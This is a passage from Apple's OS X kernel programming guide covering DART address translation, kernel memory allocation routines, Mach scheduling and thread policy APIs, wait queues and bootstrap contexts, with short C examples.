problems, however. First, physical addresses as seen by the processor no longer map 1:1 onto the addresses as seen by PCI devices. Thus, a new term, I/O addresses, is introduced to describe this new view. Because I/O addresses and physical addresses are no longer the same, the DART must keep a table of translations to use when mapping between them. Fortunately, if your driver is written according to Apple guidelines (using only documented APIs), this process is handled transparently. Note: This additional addressing mode has an impact when debugging I/O Kit device drivers. For more information, see “When Things Go Wrong: Debugging the Kernel” (page 161). IOMemoryDescriptor Changes When your driver calls IOMemoryDescriptor::prepare, a mapping is automatically injected into the DART. When it calls IOMemoryDescriptor::release , the mapping is removed. If you fail to do this, your driver could experience random data corruption or panics. Because the DART requires different caching for reads and writes, the DMA direction is important on hardware that includes a DART. While you may receive random failuresif the direction is wrong in general (on any system), if you attempt to call WriteBytes on a memory region whose DMA direction is set up for reading, you will cause a kernel panic on 64-bit hardware. If you attempt to perform a DMA transaction to unwired (user) memory, on previous systems, you would only get random crashes, panics, and data corruption. On machines with a DART, you will likely get no data whatsoever. As a side-effect of changes in the memory subsystem, OS X is much more likely to return physically contiguous page ranges in memory regions. Historically, OS X returned multi-page memory regions in reverse order, starting with the last page and moving towards the first page. The result of this was that multi-page memory regions essentially never had a contiguous range of physical pages. Memory and Virtual Memory Address Spaces 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 71Because of the increased probability of seeing physically contiguous blocks of memory in a memory region, this change may expose latent bugs in some drivers that only show up when handling contiguous ranges of physical pages, which could result in incorrect behavior or panics. Note that the problems mentioned above are caused by bugs in the drivers, and could result in problems on older hardware prior to Panther. These issues are more likely to occur in Panther and later versions of OS X, however, because of the new hardware designs and the OS changes that were made to support those designs. VM System and pmap Changes: In Panther, as a result of the changes described in detail in the section on PCI address translation, physical addresses obtained directly from the pmap layer have no useful purpose outside the VM system itself. To prevent their inadvertent use in device drivers, the pmap calls are no longer available from kernel extensions. A few drivers written prior to the addition of the IOMemoryDescriptor class still use pmap calls to get the physical pages associated with a virtual address. Also, a few developers have looked at the IOMemoryDescriptor implementation and chosen to obtain addresses directly from the pmap layer to remove what was perceived as an unnecessary abstraction layer. Even without removing access to the pmap calls, these drivers would not function on systems with a DART (see the PCI section above for info on DARTs). To better emphasize this upcoming failure, Panther will cause these drivers to fail to load with an undefined symbol error (generally for pmap_extract ) even on systems without a DART. Kernel Dependency Changes Beginning in Panther, device drivers that declare a dependency on version 7 (the Panther version) of the I/O Kit will no longer automatically get symbols from Mach and BSD. This change was made to discourage I/O Kit developers from relying on symbols that are not explicitly approved for use in the I/O Kit. Existing drivers are unaffected by this change. This change only affects you if you explicitly modify your device driver to declare a dependency on version 7 of the I/O Kit to take advantage of new I/O Kit features. Summary As described above, some device drivers may require minor modifications to support Panther and higher. Apple has made every effort to ensure compatibility with existing device driversto the greatest extent possible, but a few drivers may break. If your driver breaks, you should first check to see if your driver includes any of the bugs described in the previous sections. If it does not, contact Apple Developer Technical Support for additional debugging suggestions. Memory and Virtual Memory Address Spaces 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 72Allocating Memory in the Kernel As with most things in the OS X kernel, there are a number of ways to allocate memory. The choice of routines depends both on the location of the calling routine and on the reason for allocating memory. In general, you should use Mach routines for allocating memory unless you are writing code for use in the I/O Kit, in which case you should use I/O Kit routines. Allocating Memory From a Non-I/O-Kit Kernel Extension The header defines the following routines for kernel memory allocation: ● OSMalloc—allocates a block of memory. ● OSMalloc_noblock—allocates a block of memory, but immediately returns NULL if the request would block. ● OSMalloc_nowait—same as OSMalloc_noblock. ● OSFree—releases memory allocated with any of the OSMalloc variants. ● OSMalloc_Tagalloc—allows you to create a unique tag for your memory allocations. You must create at least one tag before you can use any of the OSMalloc functions. ● OSMalloc_Tagfree—releases a tag allocated with OSMalloc_Tagalloc. (You must release all allocations associated with that tag before you call this function.) For example, to allocate and free a page of wired memory, you might write code like this: #include #define MYTAGNAME "com.apple.mytag" ... OSMallocTag mytag = OSMalloc_Tagalloc(MYTAGNAME, OSMT_DEFAULT); void *datablock = OSMalloc(PAGE_SIZE_64, mytag); ... OSFree(datablock, PAGE_SIZE_64, mytag); To allocate a page of pageable memory, pass OSMT_PAGEABLE instead of OSMT_DEFAULT in your call to OSMalloc_Tagalloc. Memory and Virtual Memory Allocating Memory in the Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 73Allocating Memory From the I/O Kit Although the I/O Kit is generally beyond the scope of this document, the I/O Kit memory management routines are presented here for completeness. In general, I/O Kit routinesshould not be used outside the I/O Kit. Similarly, Mach allocation routines should not be directly used from the I/O Kit because the I/O Kit has abstractions for those routines that fit the I/O Kit development model more closely. The I/O Kit includes the following routines for kernel memory allocation: void *IOMalloc(vm_size_t size); void *IOMallocAligned(vm_size_t size, vm_size_t alignment); void *IOMallocContiguous(vm_size_t size, vm_size_t alignment, IOPhysicalAddress *physicalAddress); void *IOMallocPageable(vm_size_t size, vm_size_t alignment); void IOFree(void *address, vm_size_t size); void IOFreeAligned(void *address, vm_size_t size); void IOFreeContiguous(void *address, vm_size_t size); void IOFreePageable(void *address, vm_size_t size); Most of these routines are relatively transparent wrappers around the Mach allocation functions. There are two major differences, however. First, the caller does not need to know which memory map is being modified. Second, they have a separate free call for each allocation call for internal bookkeeping reasons. The functions IOMallocContiguous and IOMallocAligned differsomewhat fromtheir Mach underpinnings. IOMallocAligned uses calls directly to Mach VM to add support for arbitrary (power of 2) data alignment, rather than aligning based on the size of the object. IOMallocContiguous adds an additional parameter, PhysicalAddress. If this pointer is not NULL, the physical address is returned through this pointer. Using Mach functions, obtaining the physical address requires a separate function call. Memory and Virtual Memory Allocating Memory in the Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 74Important: If your KEXT allocates memory that will be shared, you should create a buffer of type IOMemoryDescriptor or IOBufferMemoryDescriptor and specify that the buffer should be sharable. If you are allocating memory in a user application that will be shared with the kernel, you should use valloc or vm_allocate instead of malloc and then call mach_make_memory_entry_64. Allocating Memory In the Kernel Itself In addition to the routines available to kernel extensions, there are a number of other functions you can call to allocate memory when you are modifying the Mach kernel itself. Mach routines provide a relatively straightforward interface for allocating and releasing memory. They are the preferred mechanism for allocating memory outside of the I/O Kit. BSD also offers _MALLOC and _FREE, which may be used in BSD parts of the kernel. These routines do not provide for forced mapping of a given physical address to a virtual address. However, if you need such a mapping, you are probably writing a device driver, in which case you should be using I/O Kit routines instead of Mach routines. Most of these functions are based around the vm_offset_t type, which is a pointer-sized integer. In effect, you can think of them as pointers, with the caveat that they are not necessarily pointers to data in the kernel’s address space, depending on usage. These are some of the commonly used Mach routines for allocating memory: kern_return_t kmem_alloc(vm_map_t map, vm_offset_t *addrp, vm_size_t size); void kmem_free(vm_map_t map, vm_offset_t addr, vm_size_t size); kern_return_t mem_alloc_aligned(vm_map_t map, vm_offset_t *addrp, vm_size_t size); kern_return_t kmem_alloc_wired(vm_map_t map, vm_offset_t *addrp, vm_size_t size); kern_return_t kmem_alloc_pageable(vm_map_t map, vm_offset_t *addrp, vm_size_t size); kern_return_t kmem_alloc_contig(vm_map_t map, vm_offset_t *addrp, vm_size_t size, vm_offset_t mask, int flags); These functions all take a map as the first argument. Unless you need to allocate memory in a different map, you should pass kernel_map for this argument. Memory and Virtual Memory Allocating Memory in the Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 75All of the kmem_alloc functions except kmem_alloc_pageable allocate wired memory. The function kmem_alloc_pageable creates the appropriate VM structures but does not back the region with physical memory. This function could be combined with vm_map_copyout when creating a new address map, for example. In practice, it is rarely used. The function kmem_alloc_aligned allocates memory aligned according to the value of the size argument, which must be a power of 2. The function kmem_alloc_wired is synonymous with kmem_alloc and is appropriate for data structures that cannot be paged out. It is not strictly necessary; however, if you explicitly need certain pieces of data to be wired, using kmem_alloc_wired makes it easier to find those portions of your code. The function kmem_alloc_contig attempts to allocate a block of physically contiguous memory. This is not always possible, and requires a full sort of the system free list even for short allocations. After startup, this sort can cause long delays, particularly on systems with lots of RAM. You should generally not use this function. The function kmem_free is used to free an object allocated with one of the kmem_alloc functions. Unlike the standard C free function, kmem_free requires the length of the object. If you are not allocating fixed-size objects (for example, sizeof struct foo), you may have to do some additional bookkeeping, since you must free an entire object, not just a portion of one. Memory and Virtual Memory Allocating Memory in the Kernel 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 76OS X is based on Mach and BSD. Like Mach and most BSD UNIX systems, it contains an advanced scheduler based on the CMU Mach 3 scheduler. This chapter describes the scheduler from the perspective of both a kernel programmer and an application developer attempting to set scheduling parameters. This chapter begins with the “Overview of Scheduling” (page 77), which describes the basic concepts behind Mach scheduling at a high level, including real-time priority support. The second section, “Using Mach Scheduling From User Applications” (page 79), describes how to access certain key Mach scheduler routines from user applications and from other parts of the kernel outside the scheduler. The third section, “Kernel Thread APIs” (page 85), explains scheduler-related topics including how to create and terminate kernel threads and describes the BSD spl macros and their limited usefulness in OS X. Overview of Scheduling The OS X scheduler is derived from the scheduler used in OSFMK 7.3. In general, much documentation about prior implementations applies to the scheduler in OS X, although you will find numerous differences. The details of those differences are beyond the scope of this overview. Mach scheduling is based on a system of run queues at various priorities that are handled in different ways. The priority levels are divided into four bands according to their characteristics, as described in Table 10-1 (page 77). Table 10-1 Thread priority bands Priority Band Characteristics Normal normal application thread priorities System high priority threads whose priority has been raised above normal threads reserved for threads created inside the kernel that need to run at a higher priority than all user space threads (I/O Kit workloops, for example) Kernel mode only threads whose priority is based on getting a well-defined fraction of total clock cycles, regardless of other activity (in an audio player application, for example). Real-time threads 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 77 Mach Scheduling and Thread InterfacesThreads can migrate between priority levels for a number of reasons, largely as an artifact of the time sharing algorithm used. However, this migration is within a given band. Threads marked as being real-time priority are also special in the eyes of the scheduler. A real-time thread tells the scheduler that it needs to run for A cycles out of the next B cycles. For example, it might need to run for 3000 out of the next 7000 clock cyclesin order to keep up. It also tellsthe scheduler whether those cycles must be contiguous. Using long contiguous quanta is generally frowned upon but is occasionally necessary for specialized real-time applications. The kernel will make every effort to honor the request, but since this is soft real-time, it cannot be guaranteed. In particular, if the real-time thread requests something relatively reasonable, its priority will remain in the real-time band, but if it lies blatantly about its requirements and behaves in a compute-bound fashion, it may be demoted to the priority of a normal thread. Changing a thread’s priority to turn it into a real-time priority thread using Mach calls is described in more detail in “Using Mach Scheduling From User Applications” (page 79). In addition to the raw Mach RPC interfaces, some aspects of a thread’s priority can be controlled from user space using the POSIX thread priority API. The POSIX thread API is able to set thread priority only within the lowest priority band (0–63). For more information on the POSIX thread priority API, see “Using the pthreads API to Influence Scheduling” (page 79). Why Did My Thread Priority Change? There are many reasons that a thread’s priority can change. This section attempts to explain the root cause of these thread priority changes. A real-time thread, as mentioned previously, is penalized (and may even be knocked down to normal thread priority) if it exceeds its time quantum without blocking repeatedly. For this reason, it is very important to make a reasonable guess about your thread’s workload if it needs to run in the real-time band. Threadsthat are heavily compute-bound are given lower priority to help minimize response time for interactive tasksso that high–priority compute–bound threads cannot monopolize the system and prevent lower–priority I/O-bound threads from running. Even at a lower priority, the compute–bound threads still run frequently, since the higher–priority I/O-bound threads do only a short amount of processing, block on I/O again, then allow the compute-bound threads to execute. All of these mechanisms are operating continually in the Mach scheduler. This meansthat threads are frequently moving up or down in priority based upon their behavior and the behavior of other threads in the system. Mach Scheduling and Thread Interfaces Why Did My Thread Priority Change? 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 78Using Mach Scheduling From User Applications There are three basic ways to change how a user thread is scheduled. You can use the BSD pthreads API to change basic policy and importance. You can also use Mach RPC calls to change a task’s importance. Finally, you can use RPC calls to change the scheduling policy to move a thread into a different scheduling band. This is commonly used when interacting with CoreAudio. The pthreads API is a user space API, and has limited relevance for kernel programmers. The Mach thread and task APIs are more general and can be used from anywhere in the kernel. The Mach thread and task calls can also be called from user applications. Using the pthreads API to Influence Scheduling OS X supports a number of policies at the POSIX threads API level. If you need real-time behavior, you must use the Mach thread_policy_set call. This is described in “Using the Mach Thread API to Influence Scheduling” (page 80). The pthreads API adjuststhe priority of threads within a given task. It does not necessarily impact performance relative to threads in other tasks. To increase the priority of a task, you can use nice or renice from the command line or call getpriority and setpriority from your application. The API providestwo functions: pthread_getschedparam and pthread_setschedparam. Their prototypes look like this: pthread_setschedparam(pthread_t thread, int policy, struct sched_param *param); pthread_getschedparam(pthread_t thread, int *policy, struct sched_param *param) The arguments for pthread_getschedparam are straightforward. The first argument is a thread ID, and the others are pointers to memory where the results will be stored. The argumentsto pthread_setschedparam are not as obvious, however. As with pthread_getschedparam, the first argument is a thread ID. The second argument to pthread_setschedparam is the desired policy, which can currently be one of SCHED_FIFO (first in, first out), SCHED_RR (round-robin), or SCHED_OTHER. The SCHED_OTHER policy is generally used for extra policies that are specific to a given operating system, and should thus be avoided when writing portable code. The third argument is a structure that contains various scheduling parameters. Mach Scheduling and Thread Interfaces Using Mach Scheduling From User Applications 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 79Here is a basic example of using pthreads functions to set a thread’s scheduling policy and priority. int set_my_thread_priority(int priority) { struct sched_param sp; memset(&sp, 0, sizeof(struct sched_param)); sp.sched_priority=priority; if (pthread_setschedparam(pthread_self(), SCHED_RR, &sp) == -1) { printf("Failed to change priority.\n"); return -1; } return 0; } This code snippet sets the scheduling policy for the current thread to round-robin scheduling, and sets the thread’s relative importance within the task to the value passed in through the priority argument. For more information, see the manual page for pthread. Using the Mach Thread API to Influence Scheduling This API is frequently used in multimedia applications to obtain real-time priority. It is also useful in other situations when the pthread scheduling API cannot be used or does not provide the needed functionality. The API consists of two functions, thread_policy_set and thread_policy_get. kern_return_t thread_policy_set( thread_act_t thread, thread_policy_flavor_t flavor, thread_policy_t policy_info, mach_msg_type_number_t count); kern_return_t thread_policy_get( thread_act_t thread, thread_policy_flavor_t flavor, thread_policy_t policy_info, mach_msg_type_number_t *count, Mach Scheduling and Thread Interfaces Using Mach Scheduling From User Applications 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 80boolean_t *get_default); The parameters of these functions are roughly the same, except that the thread_policy_get function takes pointers for the count and the get_default arguments. The count is an inout parameter, meaning that it is interpreted as the maximum amount of storage (in units of int32_t) that the calling task has allocated for the return, but it is also overwritten by the scheduler to indicate the amount of data that was actually returned. These functions get and set several parameters, according to the thread policy chosen. The possible thread policies are listed in Table 10-2 (page 81). Table 10-2 Thread policies Policy Meaning THREAD_STANDARD_POLICY Default value THREAD_TIME_CONSTRAINT_POLICY Used to specify real-time behavior. Used to indicate the importance of computation relative to other threads in a given task. THREAD_PRECEDENCE_POLICY The following code snippet shows how to set the priority of a task to tell the scheduler that it needs real-time performance. The example values provided in comments are based on the estimated needs of esd (the Esound daemon). #include #include #include #include int set_realtime(int period, int computation, int constraint) { struct thread_time_constraint_policy ttcpolicy; int ret; thread_port_t threadport = pthread_mach_thread_np(pthread_self()); ttcpolicy.period=period; // HZ/160 ttcpolicy.computation=computation; // HZ/3300; ttcpolicy.constraint=constraint; // HZ/2200; ttcpolicy.preemptible=1; Mach Scheduling and Thread Interfaces Using Mach Scheduling From User Applications 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 81if ((ret=thread_policy_set(threadport, THREAD_TIME_CONSTRAINT_POLICY, (thread_policy_t)&ttcpolicy, THREAD_TIME_CONSTRAINT_POLICY_COUNT)) != KERN_SUCCESS) { fprintf(stderr, "set_realtime() failed.\n"); return 0; } return 1; } The time values are in terms of Mach absolute time units. Since these values differ on different CPUs, you should generally use numbers relative to HZ (a global variable in the kernel that contains the current number of ticks per second). You can either handle this conversion yourself by dividing this value by an appropriate quantity or use the conversion routines described in “Using Kernel Time Abstractions ” (page 142). Say your computer reports 133 million for the value of HZ. If you pass the example values given as arguments to this function, your thread tells the scheduler that it needs approximately 40,000 (HZ/3300) out of the next 833,333 (HZ/160) bus cycles. The preemptible value (1) indicates that those 40,000 bus cycles need not be contiguous. However, the constraint value (HZ/2200) tells the scheduler that there can be no more than 60,000 bus cycles between the start of computation and the end of computation. Note: Because the constraint sets a maximum bound for computation, it must be larger than the value for computation. A straightforward example using this API is code that displays video directly to the framebuffer hardware. It needs to run for a certain number of cycles every frame to get the new data into the frame buffer. It can be interrupted without worry, but if it isinterrupted for too long, the video hardware starts displaying an outdated frame before the software writes the updated data, resulting in a nasty glitch. Audio has similar behavior, but since it is usually buffered along the way (in hardware and in software), there is greater tolerance for variations in timing, to a point. Another policy call is THREAD_PRECEDENCE_POLICY. This is used for setting the relative importance of non-real-time threads. Its calling convention issimilar, except that itsstructure is thread_precedence_policy, and contains only one field, an integer_t called importance. While thisis a signed 32-bit value, the minimum legal value is zero (IDLE_PRI). threads set to IDLE_PRI will only execute when no other thread is scheduled to execute. Mach Scheduling and Thread Interfaces Using Mach Scheduling From User Applications 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 82In general, larger values indicate higher priority. The maximum limit is subject to change, as are the priority bands, some of which have special purposes (such as real-time threads). Thus, in general, you should use pthreads APIs to achieve this functionality rather than using this policy directly unless you are setting up an idle thread. Using the Mach Task API to Influence Scheduling This relatively simple API is not particularly useful for most developers. However, it may be beneficial if you are developing a graphical user interface for Darwin. It also provides some insight into the prioritization of tasks in OS X. It is presented here for completeness. The API consists of two functions, task_policy_set and task_policy_get. kern_return_t task_policy_set( task_t task, task_policy_flavor_t flavor, task_policy_t policy_info, mach_msg_type_number_t count); kern_return_t task_policy_get( task_t task, task_policy_flavor_t flavor, task_policy_t policy_info, mach_msg_type_number_t *count, boolean_t *get_default); As with thread_policy_set and thread_policy_get, the parameters are similar, except that the task_policy_get function takes pointers for the count and the get_default arguments. The count argument is an inout parameter. It is interpreted as the maximum amount of storage that the calling task has allocated for the return, but it is also overwritten by the scheduler to indicate the amount of data that was actually returned. These functions get and set a single parameter, that of the role of a given task, which changes the way the task’s priority gets altered over time. The possible roles of a task are listed in Table 10-3 (page 83). Table 10-3 Task roles Role Meaning TASK_UNSPECIFIED Default value Mach Scheduling and Thread Interfaces Using Mach Scheduling From User Applications 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 83Role Meaning This is set when a process is executed with nice or is modified by renice. TASK_RENICED GUI application in the foreground. There can be more than one foreground application. TASK_FOREGROUND_APPLICATION TASK_BACKGROUND_APPLICATION GUI application in the background. TASK_CONTROL_APPLICATION Reserved for the dock or equivalent (assigned FCFS). TASK_GRAPHICS_SERVER Reserved for WindowServer or equivalent (assigned FCFS). The following code snippet shows how to set the priority of a task to tell the scheduler that it is a foreground application (regardless of whether it really is). #include #include #include int set_my_task_policy(void) { int ret; struct task_category_policy tcatpolicy; tcatpolicy.role = TASK_FOREGROUND_APPLICATION; if ((ret=task_policy_set(mach_task_self(), TASK_CATEGORY_POLICY, (thread_policy_t)&tcatpolicy, TASK_CATEGORY_POLICY_COUNT)) != KERN_SUCCESS) { fprintf(stderr, "set_my_task_policy() failed.\n"); return 0; } return 1; } Mach Scheduling and Thread Interfaces Using Mach Scheduling From User Applications 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 84Kernel Thread APIs The OS X scheduler provides a number of public APIs. While many of these APIs should not be used, the APIs to create, destroy, and alter kernel threads are of particular importance. While not technically part of the scheduler itself, they are inextricably tied to it. The scheduler directly provides certain services that are commonly associated with the use of kernel threads, without which kernel threads would be of limited utility. For example, the scheduler provides support for wait queues, which are used in various synchronization primitives such as mutex locks and semaphores. Creating and Destroying Kernel Threads The recommended interface for creating threads within the kernel is through the I/O Kit. It provides IOCreateThread, IOThreadSelf, and IOExitThread functions that make it relatively painless to create threads in the kernel. The basic functions for creating and terminating kernel threads are: IOThread IOCreateThread(IOThreadFunc function, void *argument); IOThread IOThreadSelf(void); void IOExitThread(void); With the exception of IOCreateThread (which is a bit more complex), the I/O Kit functions are fairly thin wrappers around Mach thread functions. The types involved are also very thin abstractions. IOThread is really the same as thread_t. The IOCreateThread function creates a new thread that immediately begins executing the function that you specify. It passes a single argument to that function. If you need to pass more than one argument, you should dynamically allocate a data structure and pass a pointer to that structure. For example, the following code creates a kernel thread and executes the function myfunc in that thread: #include #include #include struct mydata { int three; char *string; }; Mach Scheduling and Thread Interfaces Kernel Thread APIs 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 85static void myfunc(void *myarg) { struct mydata *md = (struct mydata *)myarg; IOLog("Passed %d = %s\n", md->three, md->string); IOExitThread(); } void start_threads() { IOThread mythread; struct mydata *md = (struct mydata *)malloc(sizeof(*md)); md->three = 3; md->string = (char *)malloc(2 * sizeof(char)); md->string[0] = '3'; md->string[1] = '\0'; // Start a thread using IOCreateThread mythread = IOCreateThread(&myfunc, (void *)md); } One other useful function is thread_terminate. This can be used to destroy an arbitrary thread (except, of course, the currently running thread). This can be extremely dangerous if not done correctly. Before tearing down a thread with thread_terminate, you should lock the thread and disable any outstanding timers against it. If you fail to deactivate a timer, a kernel panic will occur when the timer expires. With that in mind, you may be able to terminate a thread as follows: thread_terminate(getact_thread(thread)); There thread is of type thread_t. In general, you can only be assured that you can kill yourself, not other threads in the system. The function thread_terminate takes a single parameter of type thread_act_t (a thread activation). The function getact_thread takes a thread shuttle (thread_shuttle_t) or thread_t and returns the thread activation associated with it. SPL and Friends BSD–based and Mach–based operating systems contain legacy functions designed for basic single-processor synchronization. These include functions such as splhigh, splbio, splx, and other similar functions. Since these functions are not particularly useful for synchronization in an SMP situation, they are not particularly useful as synchronization tools in OS X. Mach Scheduling and Thread Interfaces Kernel Thread APIs 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 86If you are porting legacy code from earlier Mach–based or BSD–based operating systems, you must find an alternate means of providing synchronization. In many cases, this is as simple as taking the kernel or network funnel. In parts of the kernel, the use of spl functions does nothing, but causes no harm if you are holding a funnel (and results in a panic if you are not). In other parts of the kernel, spl macros are actually used. Because spl cannot necessarily be used for itsintended purpose, itshould not be used in general unless you are writing code it a part of the kernel that already uses it. You should instead use alternate synchronization primitives such as those described in “Synchronization Primitives” (page 128). Wait Queues and Wait Primitives The wait queue API is used extensively by the scheduler and is closely tied to the scheduler in itsimplementation. It is also used extensively in locks, semaphores, and other synchronization primitives. The wait queue API is both powerful and flexible, and as a result issomewhat large. Not all of the API is exported outside the scheduler, and parts are not useful outside the context of the wait queue functions themselves. This section documents only the public API. The wait queue API includes the following functions: void wait_queue_init(wait_queue_t wq, int policy); extern wait_queue_t wait_queue_t wait_queue_alloc(int policy); void wait_queue_free(wait_queue_t wq); void wait_queue_lock(wait_queue_t wq); void wait_queue_lock_try(wait_queue_t wq); void wait_queue_unlock(wait_queue_t wq); boolean_t wait_queue_member(wait_queue_t wq, wait_queue_sub_t wq_sub); boolean_t wait_queue_member_locked(wait_queue_t wq, wait_queue_sub_t wq_sub); kern_return_t wait_queue_link(wait_queue_t wq, wait_queue_sub_t wq_sub); kern_return_t wait_queue_unlink(wait_queue_t wq, wait_queue_sub_t wq_sub); kern_return_t wait_queue_unlink_one(wait_queue_t wq, wait_queue_sub_t *wq_subp); void wait_queue_assert_wait(wait_queue_t wq, event_t event, int interruptible); void wait_queue_assert_wait_locked(wait_queue_t wq, event_t event, int interruptible, boolean_t unlocked); kern_return_t wait_queue_wakeup_all(wait_queue_t wq, event_t event, int result); kern_return_t wait_queue_peek_locked(wait_queue_t wq, event_t event, thread_t *tp, wait_queue_t *wqp); Mach Scheduling and Thread Interfaces Kernel Thread APIs 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 87void wait_queue_pull_thread_locked(wait_queue_t wq, thread_t thread, boolean_t unlock); thread_t wait_queue_wakeup_identity_locked(wait_queue_t wq, event_t event, int result, boolean_t unlock); kern_return_t wait_queue_wakeup_one(wait_queue_t wq, event_t event, int result); kern_return_t wait_queue_wakeup_one_locked(wait_queue_t wq, event_t event, int result, boolean_t unlock); kern_return_t wait_queue_wakeup_thread(wait_queue_t wq, event_t event, thread_t thread, int result); kern_return_t wait_queue_wakeup_thread_locked(wait_queue_t wq, event_t event, thread_t thread, int result, boolean_t unlock); kern_return_t wait_queue_remove(thread_t thread); Most of the functions and their arguments are straightforward and are not presented in detail. However, a few require special attention. Most of the functions take an event_t as an argument. These can be arbitrary 32-bit values, which leads to the potential for conflicting events on certain wait queues. The traditional way to avoid this problem is to use the address of a data object that is somehow related to the code in question as that 32-bit integer value. For example, if you are waiting for an event that indicates that a new block of data has been added to a ring buffer, and if that ring buffer’s head pointer was called rb_head, you might pass the value &rb_head as the event ID. Because wait queue usage does not generally cross address space boundaries, this is generally sufficient to avoid any event ID conflicts. Notice the functions ending in _locked. These functions require that your thread be holding a lock on the wait queue before they are called. Functions ending in _locked are equivalent to their nonlocked counterparts (where applicable) except that they do not lock the queue on entry and may not unlock the queue on exit (depending on the value of unlock). The remainder of this section does not differentiate between locked and unlocked functions. The wait_queue_alloc and wait_queue_init functions take a policy parameter, which can be one of the following: ● SYNC_POLICY_FIFO—first-in, first-out ● SYNC_POLICY_FIXED_PRIORITY—policy based on thread priority Mach Scheduling and Thread Interfaces Kernel Thread APIs 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 88● SYNC_POLICY_PREPOST—keep track of number of wakeups where no thread was waiting and allow threadsto immediately continue executing without waiting until that count reaches zero. Thisisfrequently used when implementing semaphores. You should not use the wait_queue_init function outside the scheduler. Because a wait queue is an opaque object outside that context, you cannot determine the appropriate size for allocation. Thus, because the size could change in the future, you should always use wait_queue_alloc and wait_queue_free unless you are writing code within the scheduler itself. Similarly, the functions wait_queue_member, wait_queue_member_locked, wait_queue_link, wait_queue_unlink, and wait_queue_unlink_one are operations on subordinate queues, which are not exported outside the scheduler. The function wait_queue_member determines whether a subordinate queue is a member of a queue. The functions wait_queue_link and wait_queue_unlink link and unlink a given subordinate queue from its parent queue, respectively. The function wait_queue_unlink_one unlinks the first subordinate queue in a given parent and returns it. The function wait_queue_assert_wait causes the calling thread to wait on the wait queue until it is either interrupted (by a thread timer, for example) or explicitly awakened by another thread. The interruptible flag indicates whether this function should allow an asynchronous event to interrupt waiting. The function wait_queue_wakeup_all wakes up all threads waiting on a given queue for a particular event. The function wait_queue_peek_locked returns the first thread from a given wait queue that is waiting on a given event. It does not remove the thread from the queue, nor does it wake the thread. It also returns the wait queue where the thread was found. If the thread is found in a subordinate queue, other subordinate queues are unlocked, as is the parent queue. Only the queue where the thread was found remains locked. The function wait_queue_pull_thread_locked pulls a thread from the wait queue and optionally unlocks the queue. This is generally used with the result of a previous call to wait_queue_peek_locked. The function wait_queue_wakeup_identity_locked wakes up the first thread that is waiting for a given event on a given wait queue and starts it running but leaves the thread locked. It then returns a pointer to the thread. This can be used to wake the first thread in a queue and then modify unrelated structures based on which thread was actually awakened before allowing the thread to execute. The function wait_queue_wakeup_one wakes up the first thread that is waiting for a given event on a given wait queue. The function wait_queue_wakeup_thread wakes up a given thread if and only if it is waiting on the specified event and wait queue (or one of its subordinates). Mach Scheduling and Thread Interfaces Kernel Thread APIs 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 89The function wait_queue_remove wakes a given thread without regard to the wait queue or event on which it is waiting. Mach Scheduling and Thread Interfaces Kernel Thread APIs 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 90In OS X kernel programming, the term context has several meanings that appear similar on the surface, but differ subtly. First, the term context can refer to a BSD process or Mach task. Switching from one process to another is often referred to as a context switch. Second, context can refer to the part of the operating system in which your code resides. Examples of this include thread contexts, the interrupt context, the kernel context, an application’s context, a Carbon File Manager context, and so on. Even for this use of the term, the exact meaning depends, ironically, on the context in which the term is used. Finally, context can refer to a bootstrap context. In Mach, the bootstrap task is assigned responsibility for looking up requests for Mach ports. As part of this effort, each Mach task is registered in one of two groups—either in the startup context or a user’s login context. (In theory, Mach can support any number of independent contexts, however the use of additional contexts is beyond the scope of this document.) For the purposes of this chapter, the term context refers to a bootstrap context. When OS X first boots, there is only the top-level context, which is generally referred to as the startup context. All other contexts are subsets of this context. Basic system services that rely on Mach ports must be started in this context in order to work properly. When a user logs in, the bootstrap task creates a new context called the login context. Programs run by the user are started in the login context. This allows the user to run a program that provides an alternate port lookup mechanism if desired, causing that user’s tasks to get a different port when the tasks look up a basic service. This has the effect of replacing that service with a user-defined version in a way that changes what the user’s tasks see, but does not affect any of the rest of the system. To avoid wasting memory, currently the login context is destroyed when the user logs out (orshortly thereafter). This behavior may change in the future, however. In the current implementation, programs started by the user will no longer be able to look up Mach ports after logout. If a program does not need to do any port lookup, it will not be affected. Other programs will terminate, hang, or behave erratically. For example, in Mac OS 10.1 and earlier, sshd continuesto function when started from a user context. However, since it is unable to communicate with lookupd or netinfo, it stops accepting passwords. This is not a particularly useful behavior. 2012-02-16 | © 2002, 2012 Apple Inc. All Rights Reserved. 91 Bootstrap ContextsOther programs such as esound, however, continue to work correctly after logout when started from a user context. Other programs behave correctly in their default configuration but fail in other configurations—for example, when authentication support is enabled. There are no hard and fast rules for which programs will continue to operate after their bootstrap context is destroyed. Only thorough testing can tell you whether any given program will misbehave if started from a user context, since even programs that do not appear to directly use Mach communication may still do so indirectly. In OS X v10.2, a great deal of effort has gone into making sure that programs that use only standard BSD services and functions do not use Mach lookups in a way that would fail if started from a user context. If you find an application that breaks when started from a Terminal.app window, please file a bug report. How Contexts Affect Users From the perspective of a user, contexts are generally unimportant as long as they do not want a program to survive past the end of their login session. Contexts do become a problem for the administrator, however. For example, if the administrator upgrades sshd by killing the old version, starting the new one, and logging out, strange things could happen since the context in which sshd was running no longer exists. Contexts also pose an issue for usersrunning background jobs with nohup or users detaching terminalsessions using screen. There are times when it is perfectly reasonable for a program to survive past logout, but by default, this does not occur. There are three basic ways that a user can get around this. In the case of 